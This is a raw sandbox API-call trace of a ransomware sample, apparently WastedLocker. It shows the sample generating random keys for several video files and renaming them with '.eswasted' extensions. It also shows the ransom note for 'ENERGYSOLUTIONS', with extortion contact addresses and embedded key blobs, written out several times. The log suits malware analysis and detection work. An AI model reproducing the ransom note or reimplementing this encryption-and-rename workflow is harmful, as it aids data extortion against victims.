RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.648] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lUu6pcUMllDNEbqikZ2OOSDSYrAid+LbjjeHAMERZsvO1hmoLHDFYoz9/q+q2WT/\r\nKL5zbCKEDSGWcLJ7bBKOvUWj9ouwER0VE/rNrnFfscFIywe7GSnODheQRUkiV0Tc\r\npGkSyrC8Wc+/Up/Zc+WeXCDKZGpyMCBqqEbXeT8SXWzJZtj6QUT0p/YbTJsCFyKu\r\n3+90IF6GDP5DVjZ7Mn6fY2yuGQ1yIXaUePcgqexTKL15j+HnaGS6zr0FGHwcvTXc\r\n38y8cWsdYGII7XvnxrYSbf3hineGMdp2DH3NUfeTEI5vuWCWTvMUMb66yfwe4XRi\r\nc20LeKjxBkIB+BQwsQstG3KbXyjsi1nXp3hZSs7Cto2wWYwvJUxiMvEg20dtnKQ3\r\n++tDsjEQzdOtmvJU17wwIpxSHHiNbtmtYQZjIfEe++sckZYAuHevr6dYKWKhB2I8\r\ne5OtQ7Swjmezde3q3X+z4840tamj0kZe1FvgZ4r7y79cvC0mgJWnvJ0HM4SvcmGe\r\nyVDiqmLrBARSiatIk6uyKPdwXWjbBG8aRr5idfqtQeubaZJTIeZm3HmumIitFOfi\r\nyMkv0X9wobMqLwn6M+BnCcwgqWkvvJVeCMPmUW6hbREVtF13QMXvnQfuqLtU3k6L\r\nFsidGNXAOtdtZsh7+FUezjV+NtunMBzkhQvmBlAI0YI=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.648] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.648] SetEndOfFile (hFile=0x100) returned 1 [0082.650] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.650] CloseHandle (hObject=0x100) returned 1 [0082.652] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb4e0 | out: hHeap=0x4a0000) returned 1 [0082.652] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50b418 | out: hHeap=0x4a0000) returned 1 [0082.652] _aulldvrm () returned 0x0 [0082.652] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.653] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.653] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\PPEjYPUpc5z0Ew2I.flv") returned 75 [0082.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4cb4e0 [0082.653] lstrcpyW (in: lpString1=0x4cb576, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.653] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.654] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.654] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\PPEjYPUpc5z0Ew2I.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ppejypupc5z0ew2i.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.654] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.655] SetEndOfFile (hFile=0x100) returned 1 [0082.655] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.655] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.656] lstrcpyW (in: lpString1=0x4cb576, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\PPEjYPUpc5z0Ew2I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ppejypupc5z0ew2i.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\PPEjYPUpc5z0Ew2I.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ppejypupc5z0ew2i.flv.eswasted")) returned 1 [0082.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\PPEjYPUpc5z0Ew2I.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ppejypupc5z0ew2i.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.657] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.657] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5dc8 [0082.657] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5dc8) returned 0x2d0000 [0082.657] CloseHandle (hObject=0xf8) returned 1 [0082.659] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.659] CloseHandle (hObject=0xfc) returned 1 [0082.659] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.659] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.660] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.660] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.660] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.661] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.661] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.669] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.669] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.669] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.669] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Sfyuh1Ft77aO4qjFOoZY8qfoHaAXMuPtoVtDssl23OgrPDdvbffvfzJX0cjuHRFu\r\nYuZeia1IFxHx1ptvkMSi0BplB13oTqTZ6FiYxj7IMLKn9cqQzy+sIVEr9mKPqEF/\r\nc+ba+eVxb6R4rQxGqMTEjBLflhkXOOSgt3hkrWbI2kuqTyPsQm3ulDgnjD2Ll/Km\r\nZ113pEIhCDFtyJ85IwA0WPVgRDp9NeZPaRxwDld6zkMtPkHFr6DAKlT/lzjAswE7\r\nVY7zdXXqoFrA2iLNtyMKX+s5ADS7M7oBUTJ8Wcn7CZdUWLdZqDrDmAO7Wq6k8pbf\r\nZ050CdIzbLocqHw0nLPOk6GceDo4/5MlLiEVmYM/ksjultg3wH8XdBMnjdNwt1K6\r\nTO6sS83UoRUWtrF3AXZmyg+FlLoImqfp5ODpD+v0W9VHg8SrfYEsSOBQhpYohbh1\r\nD4wTKAXKHFWcpNfSoaXJf8Bl3Qv1FKsBPf8adQ4fljElmfeqh6uBf+n6GcqXSxo3\r\na/mix9IdXwQ0yVtSjIVXXDhz6W76tnILKzWUeqnVNQtKe9UN7TMGB/Jv3Y0/sPqt\r\nck5UrB15CA13P3wgBbpTjmo1CMKTcuue2i2zEEthGXXWTFokjenxU/vWmXpdmbMl\r\nw0p9nrB6Pi0dQ9dJENpD1ry0wbHdRIeLBJI2VBTG0BD=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.669] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.669] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.669] SetEndOfFile (hFile=0x100) returned 1 [0082.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.671] CloseHandle (hObject=0x100) returned 1 [0082.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb4e0 | out: hHeap=0x4a0000) returned 1 [0082.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50b508 | out: hHeap=0x4a0000) returned 1 [0082.673] _aulldvrm () returned 0x0 [0082.673] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.674] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.674] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.674] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\qgYYRSafU_tQgZQ1lrNJ.mkv") returned 79 [0082.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4d91a8 [0082.674] lstrcpyW (in: lpString1=0x4d9246, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.674] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.675] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.675] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\qgYYRSafU_tQgZQ1lrNJ.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qgyyrsafu_tqgzq1lrnj.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.676] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.724] SetEndOfFile (hFile=0x100) returned 1 [0082.725] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.725] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.725] lstrcpyW (in: lpString1=0x4d9246, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\qgYYRSafU_tQgZQ1lrNJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qgyyrsafu_tqgzq1lrnj.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\qgYYRSafU_tQgZQ1lrNJ.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qgyyrsafu_tqgzq1lrnj.mkv.eswasted")) returned 1 [0082.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\qgYYRSafU_tQgZQ1lrNJ.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qgyyrsafu_tqgzq1lrnj.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.726] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.726] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x13cc4 [0082.726] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13cc4) returned 0xb10000 [0082.726] CloseHandle (hObject=0x118) returned 1 [0082.730] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.730] CloseHandle (hObject=0xfc) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4eacd8 [0082.730] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.731] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ead20 | out: pbBuffer=0x4ead20) returned 1 [0082.731] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.731] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.732] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.732] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.740] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eacd8 | out: hHeap=0x4a0000) returned 1 [0082.740] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.740] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BfJUp4E60Tikr91omLCyX3IeprSbN7VHNN1gRap/jAst0fdce+MFEhE0ECA05lAd\r\nBy9V6i92rP/YUgu76iVhczHYhwo57ySgdoPPNrY8eB+OGRopZkNobpZV34NNwOql\r\nWUsk2d8jim1OhAHFNJm33K2fKFq3Xd9DpIcZ9yhQLA3v8MJY10zeJWSFuXGE0CWm\r\ncun7ZA4OkGpHyPIBfVpKXfaGVRzXQqws/DTRjBPG5aoac409ACZfeATmyvs+N5ZS\r\n1cXYsJaJnnrDMQTl6CFLBGt7YpKQXJxvHr2SLGg2PFJ0BrmIXRyGxlheYBr1dxUN\r\nWEpcbs/Lietjyb7XZbB+L1VOr7+xEYtLbbyksfTWX272BC5vGTduc3VkGPGwq6pA\r\n1QOZ+Jilhe7C1ftJv5n7OUj29DI1iItrvuFNN1x2Px73p6+MQR9kZVeHEDTHaH3/\r\nYHKtTJrL6B7eAkh2CtwFW7gdCcoyEMZSDK9T4M27F4mRHJKfT34Y1BqGHdVmPTqD\r\n2vbRrVqiEkycNvQ7wQJWMfVuIce8FjQXYGANOezapwOXv7hRya40GNiBA+G+8KS3\r\nCVaGU2DKqTh+sYryBA5LpSvqnujTXVdIpm09+PaQdn8M0Nw/Ja2vUyJByH2JY95d\r\nQAhwrB+MMGR+rtS665/iR9eANrmzlotvNyrvVQtH1EV=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.740] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.740] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.741] SetEndOfFile (hFile=0x100) returned 1 [0082.743] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.743] CloseHandle (hObject=0x100) returned 1 [0082.744] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.744] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5a18 | out: hHeap=0x4a0000) returned 1 [0082.745] _aulldvrm () returned 0x0 [0082.745] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.745] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.745] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Yq9P4ev.swf") returned 66 [0082.745] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28e) returned 0x4eacd8 [0082.745] lstrcpyW (in: lpString1=0x4ead5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.746] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.746] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.746] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.746] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Yq9P4ev.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yq9p4ev.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.747] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.748] SetEndOfFile (hFile=0x100) returned 1 [0082.748] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.748] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.748] lstrcpyW (in: lpString1=0x4ead5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Yq9P4ev.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yq9p4ev.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Yq9P4ev.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yq9p4ev.swf.eswasted")) returned 1 [0082.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Yq9P4ev.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yq9p4ev.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.814] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.815] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xfa6f [0082.815] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfa6f) returned 0x2d0000 [0082.815] CloseHandle (hObject=0xfc) returned 1 [0082.818] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.818] CloseHandle (hObject=0xf8) returned 1 [0082.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de1e0 [0082.818] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.819] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de228 | out: pbBuffer=0x4de228) returned 1 [0082.819] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.819] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.820] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.820] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de3e8 [0082.828] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.828] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 